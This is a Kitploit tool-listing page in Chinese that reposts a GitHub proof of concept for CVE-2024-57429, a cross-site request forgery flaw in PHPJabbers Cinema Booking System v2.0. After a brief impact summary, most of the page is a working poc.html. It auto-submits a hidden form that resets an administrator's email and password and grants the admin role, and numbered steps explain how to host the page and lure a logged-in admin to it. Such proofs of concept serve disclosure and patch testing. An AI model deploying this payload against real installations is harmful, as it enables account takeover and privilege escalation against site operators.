Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-57429 — CVE-2024-57429:PHPJabbers Cinema Booking System v2.0 存在 CSRF 漏洞,攻击者可伪造管理员请求,进而提升权限。 | Kitploit
工具/GitHubGitHub/ahrixia/cve-2024-57429
权限提升漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubahrixia/cve-2024-57429

CVE-2024-57429

CVE-2024-57429:PHPJabbers Cinema Booking System v2.0 存在 CSRF 漏洞,攻击者可伪造管理员请求,进而提升权限。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-57429

PHPJabbers Cinema Booking System v2.0 的 pjActionUpdate 函数中存在一个跨站请求伪造(CSRF)漏洞,允许远程攻击者通过诱使已认证的管理员提交未经授权的请求来提升权限。

影响:

利用此 CSRF 漏洞可能导致未经授权的操作,例如:

  • 更改管理员密码,从而有效地将其锁定在系统之外。
  • 通过更新用户角色将攻击者的权限提升为管理员。

漏洞利用 - 概念验证 (POC)

跨站请求伪造 (CSRF)

poc.html

root@kitploit:~
<html>
 <!-- CSRF PoC - Update Admin User -->
 <body>
   <form action="http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionUpdate" method="POST">
     <input type="hidden" name="user_update" value="1" />
     <input type="hidden" name="id" value="3" />
     <input type="hidden" name="role_id" value="1" />
     <input type="hidden" name="email" value="[email protected]" />
     <input type="hidden" name="password" value="newpassword123" />
     <input type="hidden" name="name" value="Attacker" />
     <input type="hidden" name="phone" value="1234567890" />
     <input type="hidden" name="status" value="T" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     history.pushState('', '', '/');
     document.forms[0].submit();
   </script>
 </body>
</html>
  1. 将上述代码保存为 poc.html
  2. 将该文件托管到服务器上,并诱使已登录应用程序的管理员访问它。
  3. 管理员的账户将被更新为攻击者的详细信息和新密码。
下载工具